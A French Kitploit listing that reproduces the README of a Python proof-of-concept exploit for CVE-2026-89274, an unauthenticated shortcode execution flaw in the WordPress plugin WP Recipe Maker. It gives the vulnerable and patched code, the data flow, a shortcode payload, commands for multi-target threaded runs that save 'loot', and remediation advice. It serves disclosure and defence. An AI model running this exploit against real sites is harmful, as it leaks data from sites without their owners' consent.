Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
By-Poloss..-.CVE-2026-89274 — PoC d'exploitation en Python pour CVE-2026-89274, une vulnérabilité d'exécution arbitraire de shortcode non authentifiée dans WordPress WP Recipe Maker <= 10.8.1 via les commentaires de recettes. | Kitploit
Outils/GitHubGitHub/polosss/by-poloss..-.cve-2026-89274
Scanners de VulnérabilitésAnalyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHubpolosss/by-poloss..-.cve-2026-89274

By-Poloss..-.CVE-2026-89274

PoC d'exploitation en Python pour CVE-2026-89274, une vulnérabilité d'exécution arbitraire de shortcode non authentifiée dans WordPress WP Recipe Maker <= 10.8.1 via les commentaires de recettes.

Voir le dépôt
il y a 5h 9mPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-89274 PoC

Poloss : @WPEF0

status python license

Proof-of-Concept exploit pour CVE-2026-89274 — vulnérabilité Unauthenticated Arbitrary Shortcode Execution dans le plugin WordPress WP Recipe Maker version ≤ 10.8.1.

⚠️ AVERTISSEMENT JURIDIQUE & ÉTHIQUE Ce script est fourni uniquement pour la recherche en sécurité dans un environnement local (localhost/lab) et ne doit pas être utilisé contre des systèmes qui ne vous appartiennent pas ou sans autorisation écrite. L'auteur décline toute responsabilité en cas d'utilisation abusive. L'utilisation contre des systèmes tiers sans autorisation peut enfreindre la loi pénale.


📌 Résumé de la Vulnérabilité

ChampValeur
CVE IDCVE-2026-89274
CibleWP Recipe Maker (wp-recipe-maker) ≤ 10.8.1
ClasseCode Injection (CWE-94) — Arbitrary Shortcode Execution
CVSS v3.19.1 Critical (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N)
VecteurContenu de commentaire de recette (non authentifié)
Sinkdo_shortcode() dans class-wprm-metadata.php
ImpactExécution de shortcode côté serveur → fuite de données via JSON-LD public
AuteurPoloss

Cause Racine (patch-diff 10.8.1 → 10.8.4)

includes/public/class-wprm-metadata.php :: sanitize_metadata()

Vulnérable (10.8.1) :

root@kitploit:~
$sanitized = strip_shortcodes( wp_strip_all_tags( do_shortcode( $metadata ) ) );

do_shortcode() exécute d'abord le shortcode, puis strip_shortcodes() ne nettoie que sa sortie — aucune protection.

Corrigé (10.8.4) :

root@kitploit:~
$sanitized = strip_shortcodes( wp_strip_all_tags(
    WPRM_Instacart::do_shortcode_safe( $metadata ) ) );

Flux de Données

root@kitploit:~
comment_content (commentaire public sur un post de recette)
   └─> reviewBody        (class-wprm-metadata.php:1017)
       └─> $metadata['review'][]   (line 1028)
           └─> sanitize_metadata( get_metadata( $recipe ) )  (line 374)
               └─> do_shortcode( $reviewBody )  ← SINK D'EXÉCUTION
                   └─> wp_json_encode() vers <script type="application/ld+json">

Prérequis

  1. Le commentaire contient le champ wprm-comment-rating (rempli via le formulaire de commentaire).
  2. Le commentaire est approuvé (auto-approbation ou manuelle par un modérateur).
  3. Aucune authentification n'est requise.

⚙️ Installation

root@kitploit:~
git clone <repo-url>
cd <repo>
python3 -m venv .venv
source .venv/bin/activate     # Windows: .venv\Scripts\activate
# Aucune dépendance externe — uniquement la bibliothèque standard Python 3.

Prérequis : Python 3.8+.


🚀 Utilisation

Cible unique

root@kitploit:~
python3 CVE-2026-89274.py -u http://localhost:8080 -p 10 \
    --shortcode '[wprm-recipe-name id=11]' \
    --marker 'PoC Recipe'

Cibles multiples (fichier)

Format targets.txt (une par ligne, url[,post_id]) :

root@kitploit:~
http://lab1.local,10
http://lab2.local,25
# les lignes de commentaire sont ignorées
http://lab3.local,7
root@kitploit:~
python3 CVE-2026-89274.py -f targets.txt -t 10 -o loot.json

Options CLI

FlagDéfautDescription
-u, --url—URL cible unique
-f, --file—Fichier de liste de cibles (url[,post_id] par ligne)
-p, --post10ID du post contenant la recette
-t, --threads5Nombre de threads workers
-o, --outputcve-2026-89274-loot.jsonFichier de sortie JSON
--shortcode[wprm-recipe-name id=11]Payload shortcode exécuté
--markerPoC RecipeSous-chaîne de preuve d'exécution dans reviewBody
--rating5Valeur de notation WPRM
--timeout25Timeout par requête (secondes)

🔍 Fonctionnement du Script

  1. Baseline — GET de la page du post, extraction du bloc <script type="application/ld+json">, collecte des reviewBody.
  2. Soumission du commentaire — POST vers /wp-comments-post.php avec le payload + le champ wprm-comment-rating.
  3. Polling — GET répété de la page pour détecter l'auto-approbation du commentaire.
  4. Vérification — Si --marker apparaît dans reviewBody → EXPLOITED. Sinon → PENDING_APPROVAL.
  5. Sortie — Enregistrement des résultats en JSON.

Statuts de Sortie

StatutSignification
EXPLOITEDShortcode exécuté & sortie divulguée dans le JSON-LD public
PENDING_APPROVALCommentaire envoyé, en attente d'approbation du modérateur
FAILPage inaccessible / commentaire rejeté / erreur

📄 Exemple de Sortie JSON

root@kitploit:~
[
  {
    "target": "http://localhost:8080",
    "post_id": 10,
    "shortcode": "[wprm-recipe-name id=11]",
    "marker": "PoC Recipe",
    "author": "poc1716000000",
    "review_bodies": ["PoC Recipe"],
    "status": "EXPLOITED",
    "evidence": "PoC Recipe",
    "note": "shortcode executed server-side; output leaked into public JSON-LD reviewBody",
    "elapsed": 9.12
  }
]

🛡️ Remédiation

  • Mettre à jour WP Recipe Maker vers ≥ 10.8.4.
  • En attendant, désactiver les commentaires sur les posts de recettes ou définir comment_moderation = 1 et auditer rigoureusement les commentaires.
  • Appliquer une règle WAF pour bloquer la syntaxe de shortcode ([...]) dans les champs de commentaire.
  • Auditer les anciens commentaires à la recherche de payloads de shortcode suspects.

📁 Structure du Dépôt

root@kitploit:~
.
├── CVE-2026-89274.py           # exploit principal
└── README.md                   # ce document
Télécharger l’outil